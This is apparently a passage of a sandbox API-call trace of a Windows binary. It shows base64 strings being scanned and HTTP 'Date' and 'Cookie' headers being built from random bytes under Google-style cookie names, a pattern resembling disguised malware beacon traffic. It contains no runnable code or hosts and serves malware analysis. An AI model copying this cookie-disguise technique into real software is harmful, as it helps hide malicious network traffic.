(lpStr="IMaH/zRLe46r7/+hnn/pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 4 [0143.788] StrSpnA (psz="/zRLe46r7/+hnn/pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.788] StrCSpnA (lpStr="zRLe46r7/+hnn/pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 8 [0143.788] StrSpnA (psz="/+hnn/pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 2 [0143.788] StrCSpnA (lpStr="hnn/pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 3 [0143.788] StrSpnA (psz="/pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.788] StrCSpnA (lpStr="pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 83 [0143.788] StrSpnA (psz="/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.788] StrCSpnA (lpStr="CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 12 [0143.788] StrSpnA (psz="+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.788] StrCSpnA (lpStr="2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 12 [0143.789] StrSpnA (psz="/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.789] StrCSpnA (lpStr="5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 26 [0143.789] StrSpnA (psz="/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.789] StrCSpnA (lpStr="gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 2 [0143.789] StrSpnA (psz="+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.789] StrCSpnA (lpStr="hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 65 [0143.789] StrSpnA (psz="+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.789] StrCSpnA (lpStr="RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 27 [0143.789] StrSpnA (psz="+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.789] StrCSpnA (lpStr="PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 13 [0143.789] StrSpnA (psz="+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.789] StrCSpnA (lpStr="EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 8 [0143.789] StrSpnA (psz="/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.789] StrCSpnA (lpStr="ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 25 [0143.789] StrSpnA (psz="/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.789] StrCSpnA (lpStr="ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 16 [0143.789] StrSpnA (psz="/KRtZmA==", pszSet="+/=") returned 1 [0143.789] StrCSpnA (lpStr="KRtZmA==", lpSet="+/=") returned 6 [0143.789] StrSpnA (psz="==", pszSet="+/=") returned 2 [0143.790] GetProcessHeap () returned 0x440000 [0143.790] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ca9e30 | out: hHeap=0x440000) returned 1 [0143.790] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.790] lstrlenA (lpString="Date: ") returned 6 [0143.790] GetProcessHeap () returned 0x440000 [0143.790] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x7) returned 0x2cabb50 [0143.790] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0143.790] lstrcpyA (in: lpString1=0x2cabb50, lpString2="Date: " | out: lpString1="Date: ") returned="Date: " [0143.790] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.790] lstrlenA (lpString="Tuesday, 28 September 2021") returned 26 [0143.790] GetProcessHeap () returned 0x440000 [0143.790] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2cabb50, Size=0x3a) returned 0x2c94460 [0143.791] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0143.791] lstrcpyA (in: lpString1=0x2c94466, lpString2="Tuesday, 28 September 2021" | out: lpString1="Tuesday, 28 September 2021") returned="Tuesday, 28 September 2021" [0143.791] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.791] lstrlenA (lpString="\r\n") returned 2 [0143.791] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0143.791] lstrcpyA (in: lpString1=0x2c94480, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0143.791] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.791] lstrlenA (lpString="Cookie: ") returned 8 [0143.792] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0143.792] lstrcpyA (in: lpString1=0x2c94482, lpString2="Cookie: " | out: lpString1="Cookie: ") returned="Cookie: " [0143.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0143.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x14f880, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x14f880) returned 0x0 [0143.792] StrDupA (lpSrch="ANID") returned="ANID" [0143.792] StrDupA (lpSrch="CGIC") returned="CGIC" [0143.792] StrDupA (lpSrch="DV") returned="DV" [0143.792] StrDupA (lpSrch="HSID") returned="HSID" [0143.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0143.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x14f768, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x14f768) returned 0x0 [0143.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0143.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x14f768, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x14f768) returned 0x0 [0143.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0143.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x14f768, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x14f768) returned 0x0 [0143.793] lstrlenA (lpString="HSID") returned 4 [0143.793] lstrlenA (lpString="CGIC") returned 4 [0143.793] lstrlenA (lpString="DV") returned 2 [0143.793] lstrlenA (lpString="ANID") returned 4 [0143.793] lstrlenA (lpString="=") returned 1 [0143.793] lstrlenA (lpString=";") returned 1 [0143.793] GetProcessHeap () returned 0x440000 [0143.793] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x617) returned 0x2cae870 [0143.793] GetProcessHeap () returned 0x440000 [0143.793] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x400) returned 0x2caee90 [0143.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0143.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2caee90, cbBuffer=0x400, dwFlags=0x2 | out: pbBuffer=0x2caee90) returned 0x0 [0143.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0143.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x14f6f0, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x14f6f0) returned 0x0 [0143.793] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0143.793] CryptBinaryToStringA (in: pbBinary=0x2caee90, cbBinary=0x100, dwFlags=0x40000001, pszString=0x0, pcchString=0x14f67c | out: pszString=0x0, pcchString=0x14f67c) returned 1 [0143.793] GetProcessHeap () returned 0x440000 [0143.793] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x159) returned 0x2ca9e30 [0143.794] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0143.794] CryptBinaryToStringA (in: pbBinary=0x2caee90, cbBinary=0x100, dwFlags=0x40000001, pszString=0x2ca9e30, pcchString=0x14f67c | out: pszString="cFcTO/N4iI6zY3IkaXgXZFB+rpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i+A/4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pcchString=0x14f67c) returned 1 [0143.794] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.794] lstrlenA (lpString="cFcTO/N4iI6zY3IkaXgXZFB+rpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i+A/4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==") returned 344 [0143.794] GetProcessHeap () returned 0x440000 [0143.794] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x175) returned 0x2caf2a0 [0143.794] StrCSpnA (lpStr="cFcTO/N4iI6zY3IkaXgXZFB+rpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i+A/4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 5 [0143.794] StrSpnA (psz="/N4iI6zY3IkaXgXZFB+rpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i+A/4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.794] StrCSpnA (lpStr="N4iI6zY3IkaXgXZFB+rpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i+A/4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 17 [0143.794] StrSpnA (psz="+rpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i+A/4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.794] StrCSpnA (lpStr="rpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i+A/4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 35 [0143.794] StrSpnA (psz="+A/4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.794] StrCSpnA (lpStr="A/4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 1 [0143.794] StrSpnA (psz="/4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.794] StrCSpnA (lpStr="4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 40 [0143.794] StrSpnA (psz="+3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.795] StrCSpnA (lpStr="3B/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 2 [0143.795] StrSpnA (psz="/jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.795] StrCSpnA (lpStr="jhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 52 [0143.795] StrSpnA (psz="/Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.795] StrCSpnA (lpStr="Q5MN6tJKRjvaV54CTriLps3HgcObuA8K/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 32 [0143.795] StrSpnA (psz="/T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.795] StrCSpnA (lpStr="T5QO/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 4 [0143.795] StrSpnA (psz="/UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.795] StrCSpnA (lpStr="UrBok4ht/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 8 [0143.795] StrSpnA (psz="/C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.795] StrCSpnA (lpStr="C6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 89 [0143.795] StrSpnA (psz="+iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.795] StrCSpnA (lpStr="iNe7mSs2PQX3p49khCdILom84UclfT0r+9uGb6U5WdTpPw==", lpSet="+/=") returned 32 [0143.795] StrSpnA (psz="+9uGb6U5WdTpPw==", pszSet="+/=") returned 1 [0143.795] StrCSpnA (lpStr="9uGb6U5WdTpPw==", lpSet="+/=") returned 13 [0143.795] StrSpnA (psz="==", pszSet="+/=") returned 2 [0143.795] lstrlenA 